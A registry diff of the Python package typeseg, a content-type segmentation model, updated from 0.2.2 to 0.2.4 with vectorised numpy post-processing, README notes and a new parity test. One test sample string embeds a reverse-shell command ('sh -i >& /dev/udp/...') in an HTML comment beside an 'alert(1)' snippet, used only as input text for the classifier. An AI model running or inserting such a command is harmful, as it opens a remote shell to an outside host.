typeseg 0.2.2__tar.gz → 0.2.4__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (33) hide show
  1. {typeseg-0.2.2 → typeseg-0.2.4}/PKG-INFO +14 -1
  2. {typeseg-0.2.2 → typeseg-0.2.4}/README.md +13 -0
  3. {typeseg-0.2.2 → typeseg-0.2.4}/pyproject.toml +1 -1
  4. typeseg-0.2.4/tests/test_postprocess_parity.py +139 -0
  5. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_postprocess.py +53 -46
  6. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/PKG-INFO +14 -1
  7. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/SOURCES.txt +1 -0
  8. {typeseg-0.2.2 → typeseg-0.2.4}/LICENSE +0 -0
  9. {typeseg-0.2.2 → typeseg-0.2.4}/setup.cfg +0 -0
  10. {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_cupy_parity.py +0 -0
  11. {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_distribution.py +0 -0
  12. {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_postprocess_perf.py +0 -0
  13. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__init__.py +0 -0
  14. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__main__.py +0 -0
  15. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cli.py +0 -0
  16. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_color.py +0 -0
  17. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cupy_backend.py +0 -0
  18. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_mamba_kernel.py +0 -0
  19. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_numpy_backend.py +0 -0
  20. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_onnx_backend.py +0 -0
  21. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_options.py +0 -0
  22. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_runtime.py +0 -0
  23. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_segmentation.py +0 -0
  24. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_tokenize.py +0 -0
  25. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.npz +0 -0
  26. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.onnx +0 -0
  27. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/manifest.json +0 -0
  28. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.npz +0 -0
  29. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.onnx +0 -0
  30. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/dependency_links.txt +0 -0
  31. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/entry_points.txt +0 -0
  32. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/requires.txt +0 -0
  33. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/top_level.txt +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: typeseg
3
- Version: 0.2.2
3
+ Version: 0.2.4
4
4
  Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
5
5
  Author: Martin Dallinger
6
6
  License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
249
249
  the interactive viewer also applies. The viewer has further heuristics
250
250
  (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
251
251
  `viewers/core.py` for those.
252
+
253
+ These passes are cheap, but on long inputs they run on the CPU and can outweigh the
254
+ model's own forward pass — so the highest throughput is with post-processing off,
255
+ exposing the raw per-character argmax:
256
+
257
+ ```python
258
+ raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
259
+ min_run_normalize=False, paired_delimiter_fill=False)
260
+ result = precise(text, raw)
261
+ ```
262
+
263
+ The trade-off is noisier segments (single-character runs, frayed boundaries); the
264
+ default keeps post-processing on for cleaner, deployment-style output.
@@ -226,3 +226,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
226
226
  the interactive viewer also applies. The viewer has further heuristics
227
227
  (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
228
228
  `viewers/core.py` for those.
229
+
230
+ These passes are cheap, but on long inputs they run on the CPU and can outweigh the
231
+ model's own forward pass — so the highest throughput is with post-processing off,
232
+ exposing the raw per-character argmax:
233
+
234
+ ```python
235
+ raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
236
+ min_run_normalize=False, paired_delimiter_fill=False)
237
+ result = precise(text, raw)
238
+ ```
239
+
240
+ The trade-off is noisier segments (single-character runs, frayed boundaries); the
241
+ default keeps post-processing on for cleaner, deployment-style output.
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "typeseg"
7
- version = "0.2.2"
7
+ version = "0.2.4"
8
8
  description = "Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba)."
9
9
  readme = "README.md"
10
10
  license = "Apache-2.0"
@@ -0,0 +1,139 @@
1
+ """Regression guards for the vectorised post-processing helpers.
2
+
3
+ The hot helpers (``_runs``, ``relabel_whitespace``, ``confidence_gate``,
4
+ ``build_segments``) were rewritten from per-character Python loops to vectorised
5
+ numpy. Each must stay bit-identical to a naive reference. We also run the full
6
+ pipeline on representative samples *looped* x1/x4/x16 so inputs cross the
7
+ 1536-byte U-Net window (multi-window seams) and post-processing runs over long
8
+ sequences -- the regime where the optimisations matter.
9
+ """
10
+ import random
11
+
12
+ import numpy as np
13
+ import pytest
14
+
15
+ import typeseg
16
+ from typeseg import _postprocess as pp
17
+
18
+
19
+ # --- naive references (the pre-optimisation implementations) ---------------
20
+
21
+ def _runs_naive(labels):
22
+ runs = []
23
+ if not labels:
24
+ return runs
25
+ start = 0
26
+ for i in range(1, len(labels) + 1):
27
+ if i == len(labels) or labels[i] != labels[start]:
28
+ runs.append((start, i, labels[start]))
29
+ start = i
30
+ return runs
31
+
32
+
33
+ def _relabel_naive(text, labels):
34
+ n = len(text)
35
+ if n == 0:
36
+ return labels
37
+ is_ws = [c in pp._WHITESPACE for c in text]
38
+ if not any(is_ws):
39
+ return labels
40
+ left, right = [-1] * n, [-1] * n
41
+ last = -1
42
+ for i in range(n):
43
+ if not is_ws[i]:
44
+ last = labels[i]
45
+ left[i] = last
46
+ last = -1
47
+ for i in range(n - 1, -1, -1):
48
+ if not is_ws[i]:
49
+ last = labels[i]
50
+ right[i] = last
51
+ out = list(labels)
52
+ for i in range(n):
53
+ if is_ws[i]:
54
+ if left[i] != -1:
55
+ out[i] = left[i]
56
+ elif right[i] != -1:
57
+ out[i] = right[i]
58
+ return out
59
+
60
+
61
+ def _gate_naive(char_probs, labels, threshold, other_index):
62
+ if threshold <= 0.0 or char_probs.size == 0:
63
+ return labels
64
+ maxp = char_probs.max(axis=1)
65
+ return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
66
+
67
+
68
+ # --- helper parity ---------------------------------------------------------
69
+
70
+ def test_runs_matches_naive():
71
+ rng = random.Random(0)
72
+ for _ in range(500):
73
+ n = rng.randint(0, 300)
74
+ labels = [rng.randint(0, 4) for _ in range(n)]
75
+ assert pp._runs(labels) == _runs_naive(labels)
76
+
77
+
78
+ def test_relabel_whitespace_matches_naive():
79
+ rng = random.Random(1)
80
+ alphabets = ["ab \t\n", "x ", " \t\n\r", "abcde "]
81
+ for _ in range(2000):
82
+ n = rng.randint(0, 60)
83
+ alpha = rng.choice(alphabets)
84
+ text = "".join(rng.choice(alpha) for _ in range(n))
85
+ labels = [rng.randint(0, 6) for _ in range(n)]
86
+ assert pp.relabel_whitespace(text, list(labels)) == _relabel_naive(text, list(labels))
87
+
88
+
89
+ def test_confidence_gate_matches_naive():
90
+ rng = np.random.default_rng(2)
91
+ for _ in range(200):
92
+ n = int(rng.integers(0, 400))
93
+ cp = rng.random((n, 35)).astype(np.float32)
94
+ labels = [int(x) for x in rng.integers(0, 35, n)]
95
+ for thr in (0.0, 0.1, 0.3, 0.9):
96
+ got = pp.confidence_gate(cp, list(labels), thr, 35)
97
+ assert got == _gate_naive(cp, list(labels), thr, 35)
98
+ if thr > 0 and n > 0: # gated path returns Python ints (not numpy scalars)
99
+ assert all(isinstance(x, int) for x in got)
100
+
101
+
102
+ # --- full pipeline on looped samples (multi-window) ------------------------
103
+
104
+ SAMPLES = [
105
+ '.btn { color: #3498db; }\nconst f = (x) => x + 1;\n<div onclick="alert(1)">hi</div>\n'
106
+ "UPDATE life SET status = 'ok' WHERE n > 9;\n<!-- sh -i >& /dev/udp/1.2.3.4/9 0>&1 -->\n",
107
+ '{\n "users": [{"id": 1, "name": "Alice"}, {"id": 2, "name": "Bob"}],\n "page": 1\n}',
108
+ "# My Project\n\n```\npip install x\n```\n\nA tool that does `things`. MIT.\n",
109
+ "FROM python:3.12-slim\nRUN apt-get update && rm -rf /var/lib/apt/lists/*\nCMD [\"app\"]\n",
110
+ ]
111
+
112
+
113
+ @pytest.mark.parametrize("k", [1, 4, 16])
114
+ @pytest.mark.parametrize("fn", [typeseg.fast, typeseg.precise])
115
+ def test_pipeline_consistent_on_looped_samples(fn, k):
116
+ for s in SAMPLES:
117
+ text = s * k
118
+ r = fn(text)
119
+ n = len(text)
120
+ # per-char arrays line up with the text length
121
+ assert len(r.char_labels) == n
122
+ assert len(r.char_confidence) == n
123
+ assert r.char_probs.shape == (n, len(r.labels))
124
+ # segments tile the whole text contiguously, no gaps/overlaps
125
+ assert r.segments[0].start == 0
126
+ assert r.segments[-1].end == n
127
+ for a, b in zip(r.segments, r.segments[1:]):
128
+ assert a.end == b.start
129
+ # each segment's label matches the per-char labels it covers
130
+ for seg in r.segments:
131
+ assert all(lab == seg.label for lab in r.char_labels[seg.start:seg.end])
132
+
133
+
134
+ def test_pipeline_deterministic_when_looped():
135
+ for fn in (typeseg.fast, typeseg.precise):
136
+ text = SAMPLES[0] * 8
137
+ a, b = fn(text), fn(text)
138
+ assert a.char_labels == b.char_labels
139
+ assert [s.label for s in a.segments] == [s.label for s in b.segments]
@@ -17,15 +17,18 @@ _WHITESPACE = set(" \t\n\r\f\v")
17
17
 
18
18
 
19
19
  def _runs(labels: List[int]) -> List[Tuple[int, int, int]]:
20
- runs: List[Tuple[int, int, int]] = []
21
- if not labels:
22
- return runs
23
- start = 0
24
- for i in range(1, len(labels) + 1):
25
- if i == len(labels) or labels[i] != labels[start]:
26
- runs.append((start, i, labels[start]))
27
- start = i
28
- return runs
20
+ # Contiguous equal-label spans. Vectorised: the change points are where adjacent
21
+ # labels differ. This is called once per post-processing pass over the full
22
+ # sequence, so the pure-Python scan (with its per-iteration len()) dominated the
23
+ # pipeline; np.diff finds the boundaries in C. Output is identical.
24
+ n = len(labels)
25
+ if n == 0:
26
+ return []
27
+ arr = np.asarray(labels)
28
+ cuts = np.flatnonzero(arr[1:] != arr[:-1]) + 1
29
+ starts = [0, *cuts.tolist()]
30
+ ends = [*cuts.tolist(), n]
31
+ return [(s, e, int(labels[s])) for s, e in zip(starts, ends)]
29
32
 
30
33
 
31
34
  def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
@@ -34,29 +37,21 @@ def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
34
37
  n = len(text)
35
38
  if n == 0:
36
39
  return labels
37
- is_ws = [c in _WHITESPACE for c in text]
38
- if not any(is_ws):
40
+ ws = np.fromiter((c in _WHITESPACE for c in text), dtype=bool, count=n)
41
+ if not ws.any():
39
42
  return labels
40
- left = [-1] * n
41
- right = [-1] * n
42
- last = -1
43
- for i in range(n):
44
- if not is_ws[i]:
45
- last = labels[i]
46
- left[i] = last
47
- last = -1
48
- for i in range(n - 1, -1, -1):
49
- if not is_ws[i]:
50
- last = labels[i]
51
- right[i] = last
52
- out = list(labels)
53
- for i in range(n):
54
- if is_ws[i]:
55
- if left[i] != -1:
56
- out[i] = left[i]
57
- elif right[i] != -1:
58
- out[i] = right[i]
59
- return out
43
+ labels_arr = np.asarray(labels)
44
+ pos = np.arange(n)
45
+ # left_src[i] = index of nearest non-ws char at <= i (-1 if none): running max of
46
+ # the non-ws indices. right_src[i] = nearest non-ws at >= i (n if none): reverse
47
+ # running min. A whitespace char takes its left host's label, else the right's.
48
+ left_src = np.maximum.accumulate(np.where(ws, -1, pos))
49
+ right_src = np.minimum.accumulate(np.where(ws, n, pos)[::-1])[::-1]
50
+ src = np.where(left_src >= 0, left_src, right_src) # prefer left, fall back right
51
+ take = ws & (src < n) # leave ws with no host at all
52
+ out = labels_arr.copy()
53
+ out[take] = labels_arr[src[take]]
54
+ return out.tolist()
60
55
 
61
56
 
62
57
  def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float, other_index: int) -> List[int]:
@@ -64,7 +59,7 @@ def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float,
64
59
  if threshold <= 0.0 or char_probs.size == 0:
65
60
  return labels
66
61
  maxp = char_probs.max(axis=1)
67
- return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
62
+ return np.where(maxp < threshold, other_index, np.asarray(labels, dtype=np.intp)).tolist()
68
63
 
69
64
 
70
65
  def normalize_short_runs(labels: List[int], char_probs: np.ndarray, min_run_chars: int,
@@ -424,16 +419,22 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
424
419
  if cur_score is None:
425
420
  cur_score = _boundary_local_score(text, cur_start) + _boundary_local_score(text, cur_end)
426
421
  best_start, best_end, best_score = cur_start, cur_end, cur_score
422
+ n_text = len(text)
427
423
  for ls in range(-max_shift, max_shift + 1):
428
424
  cs = cur_start + ls
429
425
  if cs < left_run[0] or cs >= cur_end:
430
426
  continue
427
+ # The wrap is valid only if text[cs-1] opens a pair; its required
428
+ # closing char is fixed by the left shift, so resolve it once here
429
+ # instead of calling _matching_wrap for every (ls, rs) combination.
430
+ close_needed = _WRAP_OPEN_TO_CLOSE.get(text[cs - 1]) if cs > 0 else None
431
+ if close_needed is None:
432
+ continue
431
433
  for rs in range(-max_shift, max_shift + 1):
432
434
  ce = cur_end + rs
433
435
  if ce <= cs or ce > right_run[1] or (cs == cur_start and ce == cur_end):
434
436
  continue
435
- if not _matching_wrap(text[cs - 1] if cs > 0 else "",
436
- text[ce] if ce < len(text) else ""):
437
+ if (text[ce] if ce < n_text else "") != close_needed:
437
438
  continue
438
439
  sc = _score_wrapped(text, char_probs, left_run, mid_run, right_run, cs, ce)
439
440
  if sc is not None and sc > best_score + 1e-6:
@@ -452,21 +453,27 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
452
453
  def build_segments(text: str, labels: List[int], char_probs: np.ndarray,
453
454
  label_names: List[str], other_index: int, other_label: str) -> Tuple[List[Segment], List[str], List[float]]:
454
455
  n = len(text)
455
- char_conf: List[float] = []
456
- char_label_names: List[str] = []
457
- for i in range(n):
458
- lab = labels[i]
459
- if char_probs.size:
460
- known_max = float(char_probs[i].max())
461
- conf = (1.0 - known_max) if lab == other_index else float(char_probs[i, lab])
462
- else:
463
- conf = 0.0
464
- char_conf.append(conf)
465
- char_label_names.append(other_label if lab == other_index else label_names[lab])
456
+ # Per-char confidence, vectorised. `other` (no probability column) scores
457
+ # 1 - max(known); every other label scores its own column. The old per-char
458
+ # `char_probs[i].max()` Python loop did n separate numpy reductions and was the
459
+ # bottleneck of the whole pipeline -- this is the same result in two reductions.
460
+ if char_probs.size:
461
+ lab_arr = np.asarray(labels, dtype=np.intp)
462
+ is_other = lab_arr == other_index
463
+ known_max = char_probs.max(axis=1) # (n,)
464
+ safe_lab = np.where(is_other, 0, lab_arr) # avoid OOB at other_index
465
+ picked = char_probs[np.arange(n), safe_lab] # (n,) chosen-label prob
466
+ conf_arr = np.where(is_other, 1.0 - known_max, picked).astype(np.float64)
467
+ else:
468
+ conf_arr = np.zeros(n, dtype=np.float64)
469
+ char_conf: List[float] = conf_arr.tolist()
470
+ char_label_names: List[str] = [
471
+ other_label if lab == other_index else label_names[lab] for lab in labels
472
+ ]
466
473
 
467
474
  segments: List[Segment] = []
468
475
  for s, e, lab in _runs(labels):
469
476
  name = other_label if lab == other_index else label_names[lab]
470
- conf = float(np.mean(char_conf[s:e])) if e > s else 0.0
477
+ conf = float(conf_arr[s:e].mean()) if e > s else 0.0
471
478
  segments.append(Segment(start=s, end=e, label=name, confidence=conf, text=text[s:e]))
472
479
  return segments, char_label_names, char_conf
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: typeseg
3
- Version: 0.2.2
3
+ Version: 0.2.4
4
4
  Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
5
5
  Author: Martin Dallinger
6
6
  License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
249
249
  the interactive viewer also applies. The viewer has further heuristics
250
250
  (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
251
251
  `viewers/core.py` for those.
252
+
253
+ These passes are cheap, but on long inputs they run on the CPU and can outweigh the
254
+ model's own forward pass — so the highest throughput is with post-processing off,
255
+ exposing the raw per-character argmax:
256
+
257
+ ```python
258
+ raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
259
+ min_run_normalize=False, paired_delimiter_fill=False)
260
+ result = precise(text, raw)
261
+ ```
262
+
263
+ The trade-off is noisier segments (single-character runs, frayed boundaries); the
264
+ default keeps post-processing on for cleaner, deployment-style output.
@@ -3,6 +3,7 @@ README.md
3
3
  pyproject.toml
4
4
  tests/test_cupy_parity.py
5
5
  tests/test_distribution.py
6
+ tests/test_postprocess_parity.py
6
7
  tests/test_postprocess_perf.py
7
8
  typeseg/__init__.py
8
9
  typeseg/__main__.py
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes